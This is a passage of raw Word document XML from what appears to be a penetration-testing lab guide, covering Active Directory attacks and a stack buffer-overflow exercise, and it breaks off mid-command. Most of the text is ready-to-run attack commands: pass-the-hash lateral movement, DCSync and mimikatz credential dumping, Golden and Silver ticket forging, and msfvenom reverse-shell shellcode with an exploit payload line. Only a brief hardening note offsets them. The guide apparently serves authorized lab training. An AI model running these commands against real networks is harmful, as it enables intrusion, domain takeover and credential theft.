      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Constrained / RBCD (resource-based constrained delegation):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> if you can write </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msDS-AllowedToActOnBehalfOfOtherIdentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> on a computer, impersonate a privileged user to it (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getST.py -impersonate administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lateral movement (Pass-the-Hash / creds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F684B50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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.20 -u administrator -H &lt;NTLM&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1E36CB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psexec.py -hashes :&lt;NTLM&gt; administrator@172.16.20.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2528F7F8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wmiexec.py lab/administrator@172.16.20.20 -hashes :&lt;NTLM&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBD9FFD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evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.20 -u administrator -H &lt;NTLM&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AF7DE9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dump domain creds (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, needs replication rights / DA / on the DC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E14AF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secretsdump.py lab.com/administrator@172.16.20.5 -just-dc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EC4A87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secretsdump.py -just-dc-user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> lab.com/administrator@172.16.20.5   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF3E56C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flow:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> recon (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>) → roast/relay/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>PtH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">/delegation → reach a Domain Admin or the DC → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → domain owned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B54BE9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="696A2C1F">
          <v:rect id="_x0000_i1202" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="162DDDDF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 xml:space="preserve">15. AD Persistence (Golden/Silver Ticket, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A57EA3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(as authorized; document clearly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF8301E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> on a compromised Windows host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5AE74E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6897A5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">          # dump plaintext/NTLM/Kerberos from LSASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E559C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">                       # local SAM hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F76EBC7" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>dcsync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>user:krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">       # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> hash (needs rights)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404034A5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"># Golden Ticket (forge a TGT as any user, incl. non-existent) — needs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> hash + domain SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A306CFD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>golden /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>user:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>domain:lab.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>:&lt;domain-SID&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>-NTLM&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2ED217F4" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t># Silver Ticket (forge a service ticket to ONE service) — needs the service account hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEDB0CD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>golden /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>user:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>domain:lab.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>:&lt;SID&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>target:host.lab.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>service:cifs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /rc4:&lt;svc-NTLM&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55A4750C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> equivalents:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ticketer.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (forge), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getST.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (request), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psexec.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wmiexec.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (use). </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detection/harden note (report side):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> rotate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> twice to invalidate Golden Tickets; monitor abnormal TGT lifetimes and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> from non-DCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B3FA1" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="292B9D6B">
          <v:rect id="_x0000_i1203" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334B70B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>16. Binary Exploitation Range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685ED345" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Stack buffer overflow vs a lab-vulnerable service (x86/x64) + basic exploit dev. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Methodology (OSED/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eCPPT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-style):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBF9B3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># 1) fuzz to crash -&gt; 2) offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0716A0" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>msf-pattern_create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -l 2000                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># send, read the fault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFBE6B9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>msf-pattern_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -l 2000 -q &lt;EIP&gt;        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># -&gt; offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CEFE94" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># 3) confirm: "A"*offset + "BBBB" -&gt; EIP=42424242</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E095686" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># 4) bad chars: send \x01..\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>, diff memory in the debugger, drop mangling bytes (\x00 usually bad)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07491598" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># 5) JMP ESP:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">  !mona</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>modules ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> !mona find -s "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>\xe4" -m &lt;no-ASLR/DEP module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CE2391" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># 6) shellcode (exclude bad chars)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14371FC2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> LHOST=10.10.14.2 LPORT=443 -f python -b "\x00\x0a\x0d" EXITFUNC=thread -v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21CA2427" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>"*offset + p32(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>jmp_esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">) + b"\x90"*16 + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># little-endian, NOP sled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D9BB5E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>; catch:  nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
